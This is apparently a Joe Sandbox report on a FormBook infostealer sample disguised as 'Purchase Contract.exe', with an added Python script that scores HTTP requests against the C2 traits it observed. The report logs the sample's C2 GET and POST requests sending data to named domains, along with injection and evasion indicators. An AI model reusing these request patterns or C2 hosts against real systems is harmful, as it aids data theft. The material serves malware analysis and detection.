# Analysis Report Purchase Contract.exe

## Overview

### Detection

| Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection |
|---|---|---|---|---|---|---|
| Threshold | 100 | 0 - 100 | | false | FormBook | |

### Confidence

| Strategy | Score | Range | Further Analysis Required? | Confidence |
|---|---|---|---|---|
| Threshold | 5 | 0 - 5 | false | |

- Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior.
- Some HTTP requests failed (404). The sample is likely to exhibit less behavior than it would with a live C2.

### MITRE ATT&CK Matrix

Trailing digits in parentheses are the report's per-technique signature-count badges, which the extraction ran together (e.g. "(512)" is several adjacent counts, not one number).

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Execution through Module Load (1) | Registry Run Keys / Startup Folder (1) | Process Injection (512) | Software Packing (2) | Credential Dumping (1) | Security Software Discovery (131) | Remote File Copy (3) | Man in the Browser (1) | Data Encrypted (1) | Remote File Copy (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Replication Through Removable Media | Exploitation for Client Execution (1) | Port Monitors | Accessibility Features | Disabling Security Tools (1) | Input Capture (1) | File and Directory Discovery (2) | Remote Services | Data from Local System (1) | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information (1) | Input Capture | System Information Discovery (12) | Windows Remote Management | Email Collection (1) | Automated Exfiltration | Standard Non-Application Layer Protocol (4) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information (2) | Credentials in Files | Virtualization/Sandbox Evasion (3) | Logon Scripts | Input Capture (1) | Data Encrypted | Standard Application Layer Protocol (14) | SIM Card Swap | | Premium SMS Toll Fraud |
| Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading (1) | Account Manipulation | Process Discovery (2) | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion (3) | Brute Force | Remote System Discovery (1) | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features |
| Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection (512) | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

### Signature Overview

#### AV Detection:

- Multi AV Scanner detection for domain / URL
  - Source: www.porcber.com, Virustotal: Detection: 6%
  - Source: http://www.porcber.com, Virustotal: Detection: 6%
- Multi AV Scanner detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe, Virustotal: Detection: 32%
  - Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe, ReversingLabs: Detection: 45%
- Multi AV Scanner detection for submitted file
  - Source: Purchase Contract.exe, Virustotal: Detection: 32%
  - Source: Purchase Contract.exe, ReversingLabs: Detection: 45%
- Yara detected FormBook
- Machine Learning detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe, Joe Sandbox ML: detected
- Machine Learning detection for sample
  - Source: Purchase Contract.exe, Joe Sandbox ML: detected
- Antivirus or Machine Learning detection for unpacked file
  - Source: 15.2.updategtmlg.exe.49a0000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
  - Source: 13.2.updategtmlg.exe.57c0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
  - Source: 0.2.Purchase Contract.exe.5370000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

#### Networking:

- HTTP GET or POST without a user agent
  - Source: global traffic, HTTP traffic detected (each request sent with Connection: close and a 7-byte body of 00 00 00 00 00 00 00):
    - `GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1` Host: www.bookwormegy.com
    - `GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1` Host: www.bridgejfc.com
    - `GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1` Host: www.axcyl.com
    - `GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1` Host: www.3dlasermaroc.com
    - `GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1` Host: www.porcber.com
    - `GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1` Host: www.yyw518.com
    - `GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1` Host: www.vamojunto.com
- IP address seen in connection with other malware
  - Source: Joe Sandbox View, IP Address: 35.242.251.130
  - Source: Joe Sandbox View, IP Address: 94.136.40.82
  - Source: Joe Sandbox View, IP Address: 23.20.239.12
- Internet Provider seen in connection with other malware
  - Source: Joe Sandbox View, ASN Name: unknown (reported five times)
- Uses a known web browser user agent for HTTP communication
  - Source: global traffic, HTTP traffic detected: six `POST /mq3/ HTTP/1.1` requests that differ only in the host:
    - Host: www.bridgejfc.com, Origin: http://www.bridgejfc.com, Referer: http://www.bridgejfc.com/mq3/
    - Host: www.axcyl.com, Origin: http://www.axcyl.com, Referer: http://www.axcyl.com/mq3/
    - Host: www.3dlasermaroc.com, Origin: http://www.3dlasermaroc.com, Referer: http://www.3dlasermaroc.com/mq3/
    - Host: www.porcber.com, Origin: http://www.porcber.com, Referer: http://www.porcber.com/mq3/
    - Host: www.yyw518.com, Origin: http://www.yyw518.com, Referer: http://www.yyw518.com/mq3/
    - Host: www.vamojunto.com, Origin: http://www.vamojunto.com, Referer: http://www.vamojunto.com/mq3/
  - Headers common to all six: Connection: close, Content-Length: 155035, Cache-Control: no-cache, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Content-Type: application/x-www-form-urlencoded, Accept: */*, Accept-Language: en-US, Accept-Encoding: gzip, deflate
- Downloads files from webservers via HTTP
  - Source: global traffic, HTTP traffic detected: the same seven GET requests to www.bookwormegy.com, www.bridgejfc.com, www.axcyl.com, www.3dlasermaroc.com, www.porcber.com, www.yyw518.com and www.vamojunto.com listed under "HTTP GET or POST without a user agent" above.
- Performs DNS lookups
  - Source: unknown, DNS traffic detected: queries for: www.zcs-edu.com
- Posts data to webserver
  - Source: unknown, HTTP traffic detected: `POST /mq3/ HTTP/1.1` Host: www.bridgejfc.com, Connection: close, Content-Length: 155035, Cache-Control: no-cache, Origin: http://www.bridgejfc.com, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Content-Type: application/x-www-form-urlencoded, Accept: */*, Referer: http://www.bridgejfc.com/mq3/, Accept-Language: en-US, Accept-Encoding: gzip, deflate
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Tue, 28 Apr 2020 01:16:56 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii (decoded from the hex above; the report rendered only the text nodes): `<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>` (CRLF line breaks omitted). This is the stock nginx error page and its length matches the Content-Length of 153 bytes: the host answered, the /mq3/ route did not.
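The request above is logged with its header line breaks lost and its body only as a hex dump. As an added example (not part of the Joe Sandbox report), the Python below rebuilds the request from the page's own header values and the first 44 bytes of the Data Raw hex, decodes the body, and scores the request against the traits visible in this capture. The traits and thresholds (a short single-segment path, a form body of at least 100 KB, the character alphabet of the value) are this example's own heuristics drawn from this one capture, not a FormBook signature; the benign control request is constructed.

```python
"""Parse a raw HTTP request and score it against the C2 traits seen in the
POST to www.bridgejfc.com/mq3/ above. Heuristics are illustrative only."""
import re
from urllib.parse import urlsplit

# Constructed from the report: request line and headers of the POST to /mq3/.
SAMPLE_HEADERS = (
    "POST /mq3/ HTTP/1.1\r\n"
    "Host: www.bridgejfc.com\r\n"
    "Connection: close\r\n"
    "Content-Length: 155035\r\n"
    "Cache-Control: no-cache\r\n"
    "Origin: http://www.bridgejfc.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.bridgejfc.com/mq3/\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)
# First 44 bytes of the report's "Data Raw" dump (the full body is 155035 bytes).
SAMPLE_BODY_HEX = ("4b 78 6c 70 64 3d 6d 4f 75 5f 28 41 35 4c 69 6f 59 44 41 52 47 4b 43 5f "
                   "38 51 4c 6b 76 50 63 65 69 76 71 4c 79 44 59 59 28 47 28 77")

# Constructed benign control: a same-origin JSON API call from a real browser.
BENIGN_HEADERS = (
    "POST /api/v1/session HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0\r\n"
    "Content-Type: application/json\r\n"
    "Origin: https://example.test\r\n"
    "Referer: https://example.test/login\r\n"
    "Content-Length: 14\r\n"
    "\r\n"
)
BENIGN_BODY = b'{"user": "a"}'

# Shape of the decoded body: one field name, "=", then a value limited to the
# alphabet observed in this dump (letters, digits, _ ( ) ~ -). Assumption.
FORM_VALUE = re.compile(rb"^([A-Za-z0-9]+)=([A-Za-z0-9_()~\-]+)$")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request head into (method, path, {header: value})."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def decode_hex_dump(hexdump: str) -> bytes:
    """Turn a Joe Sandbox style 'xx xx xx' dump back into bytes."""
    return bytes.fromhex(hexdump)


def c2_post_indicators(raw_headers: str, body: bytes) -> list:
    """Return the list of traits from the /mq3/ capture that this request shares."""
    method, path, h = parse_request(raw_headers)
    found = []
    if method == "POST" and h.get("content-type") == "application/x-www-form-urlencoded":
        found.append("form-urlencoded POST")
    if re.fullmatch(r"/[a-z0-9]{2,5}/", path):          # e.g. /mq3/ (assumed pattern)
        found.append("short single-segment path")
    host = h.get("host", "")
    ref, origin = h.get("referer", ""), h.get("origin", "")
    if ref and urlsplit(ref).netloc == host and urlsplit(ref).path == path:
        found.append("Referer is the POST URL itself")
    if origin and urlsplit(origin).netloc == host:
        found.append("Origin equals Host")          # weak on its own: normal for same-origin
    ua = h.get("user-agent", "")
    if "Trident/7.0" in ua and "Windows NT 10.0" in ua:
        found.append("IE11 Trident UA on Windows 10")
    if h.get("connection", "").lower() == "close":
        found.append("Connection: close")
    if int(h.get("content-length", "0")) >= 100_000:  # threshold is an assumption
        found.append("large form body")
    m = FORM_VALUE.match(body)
    if m:
        found.append(f"single form field {m.group(1).decode()} with encoded value")
    return found


if __name__ == "__main__":
    body = decode_hex_dump(SAMPLE_BODY_HEX)
    print(body)
    for trait in c2_post_indicators(SAMPLE_HEADERS, body):
        print(" -", trait)
    print("benign:", c2_post_indicators(BENIGN_HEADERS, BENIGN_BODY))
```

The benign control trips only "Origin equals Host", which is exactly why that trait must be combined with the others: a same-origin Origin header is ordinary browser behaviour, whereas a Referer equal to the POST URL plus a six-figure form body and a single opaque field is not.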
Urls found in memory or binary data

#### Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
 Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmp Binary or memory string:

#### E-Banking Fraud:

Yara detected FormBook
Source: Yara match, file source type MEMORY:
- 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp
- 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp
- 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp
- 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp
- 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp
- 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp
- 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp
- 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp
- 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp
- 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp
- 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp
- 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp
- 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp
- 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp
- 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp
- 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp
Source: Yara match, file source type UNPACKEDPE:
- 0.2.Purchase Contract.exe.5370000.3.raw.unpack
- 15.2.updategtmlg.exe.49a0000.3.raw.unpack
- 13.2.updategtmlg.exe.57c0000.4.raw.unpack
- 15.2.updategtmlg.exe.49a0000.3.unpack
- 13.2.updategtmlg.exe.57c0000.4.unpack
- 0.2.Purchase Contract.exe.5370000.3.unpack

#### System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\control.exe, dropped files:
- C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
- C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.ini
- C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.ini
Malicious sample detected (through community Yara rule)
Every source below matched both community rules:
- "detect Formbook in memory", author: JPCERT/CC Incident Response Group
- "autogenerated rule brought to you by yara-signator", author: Felix Bilstein (yara-signator at cocacoding dot com)
Matched sources, type MEMORY:
- 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp
- 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp
- 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp
- 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp
- 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp
- 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp
- 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp
- 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp
- 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp
- 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp
- 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp
- 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp
- 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp
- 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp
- 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp
- 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp
Matched sources, type UNPACKEDPE:
- 0.2.Purchase Contract.exe.5370000.3.raw.unpack
- 15.2.updategtmlg.exe.49a0000.3.raw.unpack
- 13.2.updategtmlg.exe.57c0000.4.raw.unpack
- 15.2.updategtmlg.exe.49a0000.3.unpack
- 13.2.updategtmlg.exe.57c0000.4.unpack
- 0.2.Purchase Contract.exe.5370000.3.unpack
Initial sample is a PE file and has a suspicious name
 Source: initial sample Static PE information: Filename: Purchase Contract.exe
Contains functionality to call native functions
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Contract.exe (process 0), code functions:
0_2_05E01DE3, 0_2_05E1D5D2, 0_2_05E0FDDB, 0_2_05DFE58A, 0_2_05E1E581, 0_2_05D50D40, 0_2_05DFC53F, 0_2_05D71530, 0_2_05E11D1B, 0_2_05E22519, 0_2_05E144EF, 0_2_05E1DCC5, 0_2_05E13490, 0_2_05E22C9A, 0_2_05E21C9F, 0_2_05D8547E, 0_2_05D71410, 0_2_05E0F42B, 0_2_05D6740C, 0_2_05D567D0, 0_2_05E21FCE, 0_2_05D75790, 0_2_05E12782, 0_2_05E21746, 0_2_05E226F8, 0_2_05E13E96, 0_2_05E1CE66, 0_2_05D77640, 0_2_05D85E70, 0_2_05D84E61, 0_2_05D86611, 0_2_05E219E2, 0_2_05E161DF, 0_2_05D86180, 0_2_05E2D9BE, 0_2_05D8594B, 0_2_05D79110, 0_2_05D87110, 0_2_05DA9906, 0_2_05E228E8, 0_2_05D848CB, 0_2_05D6A080, 0_2_05E018B6, 0_2_05D81070, 0_2_05D89810, 0_2_05E1D016, 0_2_05D8E020, 0_2_05D80021, 0_2_05D863C2, 0_2_05D5EBE0, 0_2_05D84B96, 0_2_05D7FB40, 0_2_05D78B00, 0_2_05E222DD, 0_2_05D742B0, 0_2_05E21A99, 0_2_05D84A5B, 0_2_05E10A02, 0_2_05D8523D, 0_2_05E2E214, 0_2_010A1C88, 0_2_010A0BC9, 0_2_010A0640, 0_2_010A1D3A
Source: C:\Windows\SysWOW64\control.exe (process 3), code functions:
3_2_044E547E, 3_2_044C740C, 3_2_044D1410, 3_2_0456F42B, 3_2_0457DCC5, 3_2_045744EF, 3_2_04582C9A, 3_2_04581C9F, 3_2_04573490, 3_2_044B0D40, 3_2_04582519, 3_2_04571D1B, 3_2_0455C53F, 3_2_044D1530, 3_2_0457D5D2, 3_2_0456FDDB, 3_2_04561DE3, 3_2_0457E581, 3_2_0455E58A, 3_2_044D7640, 3_2_044E4E61, 3_2_0457CE66, 3_2_044E5E70, 3_2_044E6611, 3_2_045826F8, 3_2_04573E96, 3_2_044D8740, 3_2_04581746, 3_2_04581FCE, 3_2_044B67D0, 3_2_04572782, 3_2_044D5790, 3_2_0453A860, 3_2_044E1070, 3_2_0457D016, 3_2_044E9810, 3_2_044EE020, 3_2_044E0021, 3_2_044E48CB, 3_2_045828E8, 3_2_044CA080, 3_2_045618B6, 3_2_044E594B, 3_2_04509906, 3_2_044D9110, 3_2_044E7110, 3_2_045761DF, 3_2_044D81E0, 3_2_045819E2, 3_2_044E6180, 3_2_0458D9BE, 3_2_044E4A5B, 3_2_0458E214, 3_2_04570A02, 3_2_044E523D, 3_2_045822DD, 3_2_04581A99, 3_2_044D42B0, 3_2_044DFB40, 3_2_044D8B00, 3_2_044E63C2, 3_2_044BEBE0, 3_2_044E4B96, 3_2_0297AAE2, 3_2_029678F0, 3_2_029678EB
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe (process 13), code functions:
13_2_06216611, 13_2_06214E61, 13_2_062ACE66, 13_2_06215E70, 13_2_06207640, 13_2_062A3E96, 13_2_062B26F8, 13_2_06208740, 13_2_062B1746, 13_2_062A2782, 13_2_06205790, 13_2_061E67D0, 13_2_062B1FCE, 13_2_0629F42B, 13_2_061F740C, 13_2_06201410, 13_2_0621547E, 13_2_062B2C9A, 13_2_062B1C9F, 13_2_062A3490, 13_2_062A44EF, 13_2_062ADCC5, 13_2_06201530, 13_2_0628C53F, 13_2_062A1D1B, 13_2_062B2519, 13_2_061E0D40, 13_2_0628E58A, 13_2_062AE581, 13_2_06291DE3, 13_2_0629FDDB, 13_2_062AD5D2, 13_2_0621523D, 13_2_062A0A02, 13_2_062BE214, 13_2_06214A5B, 13_2_062042B0, 13_2_062B1A99, 13_2_062B22DD, 13_2_06208B00, 13_2_0620FB40, 13_2_06214B96, 13_2_062163C2, 13_2_061EEBE0, 13_2_06210021, 13_2_0621E020, 13_2_06219810, 13_2_062AD016, 13_2_0626A860, 13_2_06211070, 13_2_061FA080, 13_2_062918B6, 13_2_062B28E8, 13_2_062148CB, 13_2_06239906, 13_2_06209110, 13_2_06217110, 13_2_0621594B, 13_2_062BD9BE, 13_2_06216180, 13_2_062081E0, 13_2_062B19E2, 13_2_062A61DF, 13_2_03020BC9, 13_2_03020640, 13_2_03021C88, 13_2_03021D3A
Source: C:\Windows\SysWOW64\cmmon32.exe (process 14), code functions:
14_2_04E944EF, 14_2_04E9DCC5, 14_2_04EA2C9A, 14_2_04EA1C9F, 14_2_04E93490, 14_2_04E0547E, 14_2_04E8F42B, 14_2_04DF1410, 14_2_04DE740C, 14_2_04E81DE3, 14_2_04E8FDDB, 14_2_04E9D5D2, 14_2_04E9E581, 14_2_04E7E58A, 14_2_04DD0D40, 14_2_04E7C53F, 14_2_04DF1530, 14_2_04E91D1B, 14_2_04EA2519, 14_2_04EA26F8, 14_2_04E93E96, 14_2_04E04E61, 14_2_04E9CE66, 14_2_04E05E70, 14_2_04DF7640, 14_2_04E06611, 14_2_04DD67D0, 14_2_04EA1FCE, 14_2_04DF5790, 14_2_04E92782, 14_2_04DF8740, 14_2_04EA1746, 14_2_04EA28E8, 14_2_04E048CB, 14_2_04DEA080, 14_2_04E818B6, 14_2_04E5A860, 14_2_04E01070, 14_2_04E0E020, 14_2_04E00021, 14_2_04E09810, 14_2_04E9D016, 14_2_04EA19E2, 14_2_04E961DF, 14_2_04DF81E0, 14_2_04EAD9BE, 14_2_04E06180, 14_2_04E0594B, 14_2_04DF9110, 14_2_04E29906, 14_2_04E07110, 14_2_04EA22DD, 14_2_04DF42B0, 14_2_04EA1A99, 14_2_04E04A5B, 14_2_04E0523D, 14_2_04E90A02, 14_2_04EAE214, 14_2_04E063C2, 14_2_04DDEBE0, 14_2_04E04B96, 14_2_04DFFB40, 14_2_04DF8B00, 14_2_00C278EB, 14_2_00C278F0, 14_2_00C3AAE2
Note on the lists: the low-order 16 bits of the main block of addresses recur in all four processes (for example ...1DE3, ...0D40, ...6611 and ...E214) at a constant per-process offset, i.e. one and the same module mapped at a different base in each process, which is what injection into control.exe, cmmon32.exe and the dropped updategtmlg.exe would produce. The few addresses in the 0x010A/0x0302 and 0x0297/0x00C2 ranges belong to a second, smaller region that is likewise shared pairwise (process 0 with 13, process 3 with 14).
 Found potential string decryption / allocating functions
   Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 0623DDE8 appears 50 times
   Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 061EB0E0 appears 176 times
   Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 06275110 appears 78 times
   Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0450DDE8 appears 50 times
   Source: C:\Windows\SysWOW64\control.exe Code function: String function: 044BB0E0 appears 176 times
   Source: C:\Windows\SysWOW64\control.exe Code function: String function: 04545110 appears 78 times
   Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05DE5110 appears 50 times
   Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05D5B0E0 appears 176 times
   Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05DADDE8 appears 50 times
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04E65110 appears 78 times
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04E2DDE8 appears 50 times
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04DDB0E0 appears 176 times
 Sample file name is different from the original file name gathered from version info
   Source: Purchase Contract.exe, 00000000.00000002.821337419.0000000005FDF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Contract.exe
   Source: Purchase Contract.exe, 00000000.00000000.765245970.0000000000AAA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
   Source: Purchase Contract.exe, 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamepjzKElRfvzoP.exe4 vs Purchase Contract.exe
   Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Purchase Contract.exe
   Source: Purchase Contract.exe, 00000000.00000003.807640474.000000000125C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Purchase Contract.exe
   Source: Purchase Contract.exe, 00000000.00000002.812742881.0000000005280000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Contract.exe
   Source: Purchase Contract.exe Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
 Searches the installation path of Mozilla Firefox
   Source: C:\Windows\SysWOW64\control.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
 Yara signature match
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
   Source: Purchase Contract.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
   Source: updategtmlg.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label
   Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/10@28/7
 Creates files inside the user directory
   Source: C:\Users\user\Desktop\Purchase Contract.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Contract.exe.log
 Creates mutexes
   Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_01
   Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
 Creates temporary files
   Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\S-zzxp
 PE file has an executable .text section and no other executable section
   Source: Purchase Contract.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this application are using the .NET runtime (probably coded in C#)
 Reads ini files
 Reads software policies
   Source: C:\Users\user\Desktop\Purchase Contract.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file
 Sample is known by Antivirus
   Source: Purchase Contract.exe Virustotal: Detection: 32%
   Source: Purchase Contract.exe ReversingLabs: Detection: 45%
 Spawns processes
 Uses an in-process (OLE) Automation server
   Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
 Writes ini files
   Source: C:\Windows\SysWOW64\control.exe File written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
 Uses Microsoft Silverlight
   Source: C:\Users\user\Desktop\Purchase Contract.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
 Checks if Microsoft Office is installed
   Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 PE file contains a COM descriptor data directory
   Source: Purchase Contract.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX
   Source: Purchase Contract.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols
   Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp
